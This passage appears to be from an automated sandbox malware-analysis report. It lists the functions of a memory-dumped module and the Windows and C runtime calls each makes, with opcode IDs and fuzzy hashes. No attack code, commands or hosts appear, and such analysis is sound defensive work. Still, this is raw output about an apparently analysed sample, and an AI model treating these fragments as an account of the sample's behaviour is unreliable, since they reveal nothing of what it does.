                                              • Part of subcall function 689A9BB5: std::exception::exception.LIBCMT ref: 689A9C04
                                              • Part of subcall function 689A9BB5: std::exception::exception.LIBCMT ref: 689A9C1E
                                              • Part of subcall function 689A9BB5: __CxxThrowException@8.LIBCMT ref: 689A9C2F
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2681350500.0000000068941000.00000020.00000001.01000000.00000027.sdmp, Offset: 68940000, based on PE: true
                                            • Associated: 0000000E.00000002.2680641954.0000000068940000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2687798649.00000000689C4000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688501762.00000000689DE000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688558472.00000000689E0000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688623479.00000000689E1000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2692841937.00000000689E3000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EA000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EC000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2698075637.00000000689EE000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_68940000_A_22rjVO67ooiUk2ueyL6tMl.jbxd
                                            Similarity
                                            • API ID: std::exception::exception$Exception@8Throw$_malloc
                                            • String ID:
                                            • API String ID: 2621100827-0
                                            • Opcode ID: 14c37fe6f67150ea8663c9894d7dfe18488b6002305c658995023ea93315cb9c
                                            • Instruction ID: d1cf83e0ec73b491caa87ef12b16a666dbd1709e136a38271daad8dd83f83ff6
                                            • Opcode Fuzzy Hash: 14c37fe6f67150ea8663c9894d7dfe18488b6002305c658995023ea93315cb9c
                                            • Instruction Fuzzy Hash: FC416CB59007489FDB20CF68C881A9AFBF4FF19304F80896ED85A97741D772E504CBA5
                                            APIs
                                              • Part of subcall function 689A9BB5: _malloc.LIBCMT ref: 689A9BCF
                                            • std::exception::exception.LIBCMT ref: 6895D437
                                            • __CxxThrowException@8.LIBCMT ref: 6895D44C
                                            • std::exception::exception.LIBCMT ref: 6895D45B
                                            • __CxxThrowException@8.LIBCMT ref: 6895D470
                                              • Part of subcall function 689A9BB5: std::exception::exception.LIBCMT ref: 689A9C04
                                              • Part of subcall function 689A9BB5: std::exception::exception.LIBCMT ref: 689A9C1E
                                              • Part of subcall function 689A9BB5: __CxxThrowException@8.LIBCMT ref: 689A9C2F
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2681350500.0000000068941000.00000020.00000001.01000000.00000027.sdmp, Offset: 68940000, based on PE: true
                                            • Associated: 0000000E.00000002.2680641954.0000000068940000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2687798649.00000000689C4000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688501762.00000000689DE000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688558472.00000000689E0000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688623479.00000000689E1000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2692841937.00000000689E3000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EA000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EC000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2698075637.00000000689EE000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_68940000_A_22rjVO67ooiUk2ueyL6tMl.jbxd
                                            Similarity
                                            • API ID: std::exception::exception$Exception@8Throw$_malloc
                                            • String ID:
                                            • API String ID: 2621100827-0
                                            • Opcode ID: 350aeda305fb831cbdb117345c97b15b778151f096d6147afe2c078b4f052e1b
                                            • Instruction ID: 0ca742be4b171422ae59bb71f4821cf355dd2c8908098fc17dc72f3bf319225c
                                            • Opcode Fuzzy Hash: 350aeda305fb831cbdb117345c97b15b778151f096d6147afe2c078b4f052e1b
                                            • Instruction Fuzzy Hash: 72411AB59007489FC720CF69D880A9AFBF4FF19304F80896EE95A97741D772E504CBA6
                                            APIs
                                              • Part of subcall function 68976480: __CxxThrowException@8.LIBCMT ref: 68976518
                                              • Part of subcall function 68976480: __CxxThrowException@8.LIBCMT ref: 68976558
                                              • Part of subcall function 689A9BB5: _malloc.LIBCMT ref: 689A9BCF
                                            • std::exception::exception.LIBCMT ref: 689A2C9A
                                            • __CxxThrowException@8.LIBCMT ref: 689A2CB1
                                            • std::exception::exception.LIBCMT ref: 689A2CC3
                                            • __CxxThrowException@8.LIBCMT ref: 689A2CDA
                                              • Part of subcall function 689A9BB5: std::exception::exception.LIBCMT ref: 689A9C04
                                              • Part of subcall function 689A9BB5: std::exception::exception.LIBCMT ref: 689A9C1E
                                              • Part of subcall function 689A9BB5: __CxxThrowException@8.LIBCMT ref: 689A9C2F
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2681350500.0000000068941000.00000020.00000001.01000000.00000027.sdmp, Offset: 68940000, based on PE: true
                                            • Associated: 0000000E.00000002.2680641954.0000000068940000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2687798649.00000000689C4000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688501762.00000000689DE000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688558472.00000000689E0000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688623479.00000000689E1000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2692841937.00000000689E3000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EA000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EC000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2698075637.00000000689EE000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_68940000_A_22rjVO67ooiUk2ueyL6tMl.jbxd
                                            Similarity
                                            • API ID: Exception@8Throw$std::exception::exception$_malloc
                                            • String ID:
                                            • API String ID: 3942750879-0
                                            • Opcode ID: 1898eae1bf70cf1f97c5b1ac8806c44f3992e28c981d6b334a6cbf9417f6d67c
                                            • Instruction ID: 62a911c25f2b76f4695b3d1a0f29ab351f605076c5a6cc078b2e821b82c802f6
                                            • Opcode Fuzzy Hash: 1898eae1bf70cf1f97c5b1ac8806c44f3992e28c981d6b334a6cbf9417f6d67c
                                            • Instruction Fuzzy Hash: A04158B55187019FC314CF69C880A5AFBF4FFA9314F908A2EF1AA87680D771E504CB92
                                            APIs
                                            • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 6896C478
                                            • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 6896C488
                                            • SafeArrayGetElement.OLEAUT32(?,00000001,?), ref: 6896C4B4
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 6896C512
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2681350500.0000000068941000.00000020.00000001.01000000.00000027.sdmp, Offset: 68940000, based on PE: true
                                            • Associated: 0000000E.00000002.2680641954.0000000068940000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2687798649.00000000689C4000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688501762.00000000689DE000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688558472.00000000689E0000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688623479.00000000689E1000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2692841937.00000000689E3000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EA000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EC000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2698075637.00000000689EE000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_68940000_A_22rjVO67ooiUk2ueyL6tMl.jbxd
                                            Similarity
                                            • API ID: ArraySafe$Bound$DestroyElement
                                            • String ID:
                                            • API String ID: 3987547017-0
                                            • Opcode ID: 31ce04bd1e16a83d0c6459e1fb5cbade97926e480bd44ebe99b5911aeeb097c3
                                            • Instruction ID: f4e2b00c9fe60b2a272d793a9c1e3c49b2bc2523674f9dd83a9c8316156bc546
                                            • Opcode Fuzzy Hash: 31ce04bd1e16a83d0c6459e1fb5cbade97926e480bd44ebe99b5911aeeb097c3
                                            • Instruction Fuzzy Hash: 18414D75A0414AAFDF10CF98C884DAEB7B8FF59354F508569F929E7240D730EA85CBA0
                                            APIs
                                            • VariantInit.OLEAUT32(689C02A0), ref: 6896B5D5
                                            • VariantInit.OLEAUT32(?), ref: 6896B5E2
                                            • VariantClear.OLEAUT32(?), ref: 6896B685
                                            • VariantClear.OLEAUT32(689C02A0), ref: 6896B68B
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2681350500.0000000068941000.00000020.00000001.01000000.00000027.sdmp, Offset: 68940000, based on PE: true
                                            • Associated: 0000000E.00000002.2680641954.0000000068940000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2687798649.00000000689C4000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688501762.00000000689DE000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688558472.00000000689E0000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688623479.00000000689E1000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2692841937.00000000689E3000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EA000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EC000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2698075637.00000000689EE000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_68940000_A_22rjVO67ooiUk2ueyL6tMl.jbxd
                                            Similarity
                                            • API ID: Variant$ClearInit
                                            • String ID:
                                            • API String ID: 2610073882-0
                                            • Opcode ID: 69e991c3bf5f329342f3cff944ee9bba0ed1b13b6fda1321daca6acb909cf39a
                                            • Instruction ID: 2e28afbc2a57c02d61a240193a36a879bfb2f3cdf08a1bba9f46bc5cafe3e74b
                                            • Opcode Fuzzy Hash: 69e991c3bf5f329342f3cff944ee9bba0ed1b13b6fda1321daca6acb909cf39a
                                            • Instruction Fuzzy Hash: 81414F72A05209DFDB10DFA9C980B9AF7F9FF99324F2041A9E9149B350D736E941CB90
                                            APIs
                                            • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 689B88FD
                                            • __isleadbyte_l.LIBCMT ref: 689B8930
                                            • MultiByteToWideChar.KERNEL32(00000080,00000009,?,?,?,00000000,?,?,?), ref: 689B8961
                                            • MultiByteToWideChar.KERNEL32(00000080,00000009,?,00000001,?,00000000,?,?,?), ref: 689B89CF
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2681350500.0000000068941000.00000020.00000001.01000000.00000027.sdmp, Offset: 68940000, based on PE: true
                                            • Associated: 0000000E.00000002.2680641954.0000000068940000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2687798649.00000000689C4000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688501762.00000000689DE000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688558472.00000000689E0000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688623479.00000000689E1000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2692841937.00000000689E3000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EA000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EC000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2698075637.00000000689EE000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_68940000_A_22rjVO67ooiUk2ueyL6tMl.jbxd
                                            Similarity
                                            • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                            • String ID:
                                            • API String ID: 3058430110-0
                                            • Opcode ID: 395adf20140c19523f5aed9917fc48366c18dbcce9926e4cdb61b0619734137a
                                            • Instruction ID: 8d3643926f8c4ba80d7e03b80bd45a739ec5443e37a5bfcee8cffb43a417a9b4
                                            • Opcode Fuzzy Hash: 395adf20140c19523f5aed9917fc48366c18dbcce9926e4cdb61b0619734137a
                                            • Instruction Fuzzy Hash: 8F31CE31A84247EFDF09CFA8C8849BE3BB8BF09398F904968E074AB190D331C940CB51
                                            APIs
                                              • Part of subcall function 689A9BB5: _malloc.LIBCMT ref: 689A9BCF
                                            • std::exception::exception.LIBCMT ref: 68945ACB
                                            • __CxxThrowException@8.LIBCMT ref: 68945AE0
                                            • std::exception::exception.LIBCMT ref: 68945B18
                                            • __CxxThrowException@8.LIBCMT ref: 68945B2D
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2681350500.0000000068941000.00000020.00000001.01000000.00000027.sdmp, Offset: 68940000, based on PE: true
                                            • Associated: 0000000E.00000002.2680641954.0000000068940000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2687798649.00000000689C4000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688501762.00000000689DE000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688558472.00000000689E0000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688623479.00000000689E1000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2692841937.00000000689E3000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EA000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EC000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2698075637.00000000689EE000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_68940000_A_22rjVO67ooiUk2ueyL6tMl.jbxd
                                            Similarity
                                            • API ID: Exception@8Throwstd::exception::exception$_malloc
                                            • String ID:
                                            • API String ID: 3153320871-0
                                            • Opcode ID: 6b735e68bd6fea3737e9ffe47e508c3667e1ae9d1e8a9d666083bd8c17c2bdfd
                                            • Instruction ID: 435c5eafd197c1474a5ead0951704447d5444b72d24e159ee1aa5b6168c14ee3
                                            • Opcode Fuzzy Hash: 6b735e68bd6fea3737e9ffe47e508c3667e1ae9d1e8a9d666083bd8c17c2bdfd
                                            • Instruction Fuzzy Hash: 3E3173B5900608AFCB14DF98D84199AF7F8FF58754F40866EE81997740EB71EA04CBA1
                                            APIs
                                              • Part of subcall function 689A9BB5: _malloc.LIBCMT ref: 689A9BCF
                                            • InitializeCriticalSection.KERNEL32(00000000,00000000,68955D89,00000000,00000004,00000000,?,00000000,00000000), ref: 689584EA
                                            • InitializeCriticalSection.KERNEL32(00000018,?,00000000,00000000), ref: 689584F0
                                            • std::exception::exception.LIBCMT ref: 6895853C
                                            • __CxxThrowException@8.LIBCMT ref: 68958551
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2681350500.0000000068941000.00000020.00000001.01000000.00000027.sdmp, Offset: 68940000, based on PE: true
                                            • Associated: 0000000E.00000002.2680641954.0000000068940000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2687798649.00000000689C4000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688501762.00000000689DE000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688558472.00000000689E0000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688623479.00000000689E1000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2692841937.00000000689E3000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EA000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EC000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2698075637.00000000689EE000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_68940000_A_22rjVO67ooiUk2ueyL6tMl.jbxd
                                            Similarity
                                            • API ID: CriticalInitializeSection$Exception@8Throw_mallocstd::exception::exception
                                            • String ID:
                                            • API String ID: 3005353045-0
                                            • Opcode ID: 5849289e0b9e7fc095f8caa6c16bf98ccf31df764d7560056c3dc5efe8a0dcec
                                            • Instruction ID: b6660805aeb25f5517f32a3e74ad0d9213d3673e68aa8b750624940f6be75df3
                                            • Opcode Fuzzy Hash: 5849289e0b9e7fc095f8caa6c16bf98ccf31df764d7560056c3dc5efe8a0dcec
                                            • Instruction Fuzzy Hash: BD317E75601704AFC714CF68C880A9AFBF8FF19210F80866EE85697B40D771F644CB91
                                            APIs
                                            • std::exception::exception.LIBCMT ref: 6896DCC5
                                              • Part of subcall function 689A9533: std::exception::_Copy_str.LIBCMT ref: 689A954E
                                            • __CxxThrowException@8.LIBCMT ref: 6896DCDA
                                              • Part of subcall function 689AAC75: RaiseException.KERNEL32(?,?,689A9C34,513F6A41,?,?,?,?,689A9C34,513F6A41,689D9C90,689EB974,513F6A41), ref: 689AACB7
                                              • Part of subcall function 689A9BB5: _malloc.LIBCMT ref: 689A9BCF
                                            • std::exception::exception.LIBCMT ref: 6896DD09
                                            • __CxxThrowException@8.LIBCMT ref: 6896DD1E
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2681350500.0000000068941000.00000020.00000001.01000000.00000027.sdmp, Offset: 68940000, based on PE: true
                                            • Associated: 0000000E.00000002.2680641954.0000000068940000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2687798649.00000000689C4000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688501762.00000000689DE000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688558472.00000000689E0000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688623479.00000000689E1000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2692841937.00000000689E3000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EA000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EC000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2698075637.00000000689EE000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_68940000_A_22rjVO67ooiUk2ueyL6tMl.jbxd
                                            Similarity
                                            • API ID: Exception@8Throwstd::exception::exception$Copy_strExceptionRaise_mallocstd::exception::_
                                            • String ID:
                                            • API String ID: 399550787-0
                                            • Opcode ID: 6ecf777882a2b8d158d188f1fbf225d7de7962da8182bf39cd7841ae34e8826d
                                            • Instruction ID: b86de47b4e647182542af59d8b1209930af869172c40f878447ff1c06bf596ce
                                            • Opcode Fuzzy Hash: 6ecf777882a2b8d158d188f1fbf225d7de7962da8182bf39cd7841ae34e8826d
                                            • Instruction Fuzzy Hash: 203170B5900308AFDB04DF99D851AAEBBF8FF58310F80816DE92997350D771EA04CBA1
                                            APIs
                                            • _malloc.LIBCMT ref: 689B2653
                                              • Part of subcall function 689A9D66: __FF_MSGBANNER.LIBCMT ref: 689A9D7F
                                              • Part of subcall function 689A9D66: __NMSG_WRITE.LIBCMT ref: 689A9D86
                                              • Part of subcall function 689A9D66: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,00000000,?,689A9BD4,68941290,513F6A41), ref: 689A9DAB
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2681350500.0000000068941000.00000020.00000001.01000000.00000027.sdmp, Offset: 68940000, based on PE: true
                                            • Associated: 0000000E.00000002.2680641954.0000000068940000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2687798649.00000000689C4000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688501762.00000000689DE000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688558472.00000000689E0000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688623479.00000000689E1000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2692841937.00000000689E3000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EA000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EC000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2698075637.00000000689EE000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_68940000_A_22rjVO67ooiUk2ueyL6tMl.jbxd
                                            Similarity
                                            • API ID: AllocateHeap_malloc
                                            • String ID:
                                            • API String ID: 501242067-0
                                            • Opcode ID: c6359a51e07f19a9d449cde27a48a7987569294fe0e16bfb4af987f87200d59d
                                            • Instruction ID: 963919977a726cc45c3deb8bc92798e9f3152cfa0b0747ff253208a6b46d067a
                                            • Opcode Fuzzy Hash: c6359a51e07f19a9d449cde27a48a7987569294fe0e16bfb4af987f87200d59d
                                            • Instruction Fuzzy Hash: 3C11CD36545614DBCF251FB4E80866F3BA8EF5A36AB900527FC649B250DB35C8408B54
                                            APIs
                                              • Part of subcall function 68974410: _malloc.LIBCMT ref: 6897446E
                                            • SafeArrayCreateVector.OLEAUT32(00000011,00000000,?), ref: 68957287
                                            • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 6895729B
                                            • _memmove.LIBCMT ref: 689572AF
                                            • SafeArrayUnaccessData.OLEAUT32(00000000), ref: 689572B8
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2681350500.0000000068941000.00000020.00000001.01000000.00000027.sdmp, Offset: 68940000, based on PE: true
                                            • Associated: 0000000E.00000002.2680641954.0000000068940000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2687798649.00000000689C4000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688501762.00000000689DE000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688558472.00000000689E0000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688623479.00000000689E1000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2692841937.00000000689E3000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EA000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EC000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2698075637.00000000689EE000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_68940000_A_22rjVO67ooiUk2ueyL6tMl.jbxd
                                            Similarity
                                            • API ID: ArraySafe$Data$AccessCreateUnaccessVector_malloc_memmove
                                            • String ID:
                                            • API String ID: 583974297-0
                                            • Opcode ID: 8d38290bc9a03cf269d4fa9da7857652e25732674da270d03094dc2560081be6
                                            • Instruction ID: 3f7771d6f687bd475f9f5568ebfe90458d9cc026e93f917cc4ce1decf10b7f17
                                            • Opcode Fuzzy Hash: 8d38290bc9a03cf269d4fa9da7857652e25732674da270d03094dc2560081be6
                                            • Instruction Fuzzy Hash: 881160B6A04118BBCB14CFA5D884DDFBBBDEF99654B40C269F90497200D671DA058BE1
                                            APIs
                                            • VariantInit.OLEAUT32(?), ref: 68965AB9
                                            • VariantCopy.OLEAUT32(?,689D9C90), ref: 68965AC1
                                            • VariantClear.OLEAUT32(?), ref: 68965AE2
                                            • __CxxThrowException@8.LIBCMT ref: 68965AEF
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2681350500.0000000068941000.00000020.00000001.01000000.00000027.sdmp, Offset: 68940000, based on PE: true
                                            • Associated: 0000000E.00000002.2680641954.0000000068940000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2687798649.00000000689C4000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688501762.00000000689DE000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688558472.00000000689E0000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688623479.00000000689E1000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2692841937.00000000689E3000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EA000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EC000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2698075637.00000000689EE000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_68940000_A_22rjVO67ooiUk2ueyL6tMl.jbxd
                                            Similarity
                                            • API ID: Variant$ClearCopyException@8InitThrow
                                            • String ID:
                                            • API String ID: 3826472263-0
                                            • Opcode ID: e9b1c31e16b64f12ffaffbbc1604334bea8a34868a0cb859b4187883b8f07fae
                                            • Instruction ID: ae9bf1a2f58863d144819af9196416cc0106d357e8c3340e5ddeaff991f5dd3c
                                            • Opcode Fuzzy Hash: e9b1c31e16b64f12ffaffbbc1604334bea8a34868a0cb859b4187883b8f07fae
                                            • Instruction Fuzzy Hash: 4911E672A04268AFDB10DF98C8C49DFBB7CFB45624F90412AF824A3301C7759E408BE1
                                            APIs
                                            • _malloc.LIBCMT ref: 68978D8A
                                              • Part of subcall function 689A9D66: __FF_MSGBANNER.LIBCMT ref: 689A9D7F
                                              • Part of subcall function 689A9D66: __NMSG_WRITE.LIBCMT ref: 689A9D86
                                              • Part of subcall function 689A9D66: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,00000000,?,689A9BD4,68941290,513F6A41), ref: 689A9DAB
                                              • Part of subcall function 689A91F6: std::_Lockit::_Lockit.LIBCPMT ref: 689A9202
                                            • _malloc.LIBCMT ref: 68978DAF
                                            • std::exception::exception.LIBCMT ref: 68978DD4
                                            • __CxxThrowException@8.LIBCMT ref: 68978DEB
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2681350500.0000000068941000.00000020.00000001.01000000.00000027.sdmp, Offset: 68940000, based on PE: true
                                            • Associated: 0000000E.00000002.2680641954.0000000068940000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2687798649.00000000689C4000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688501762.00000000689DE000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688558472.00000000689E0000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688623479.00000000689E1000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2692841937.00000000689E3000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EA000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EC000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2698075637.00000000689EE000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_68940000_A_22rjVO67ooiUk2ueyL6tMl.jbxd
                                            Similarity
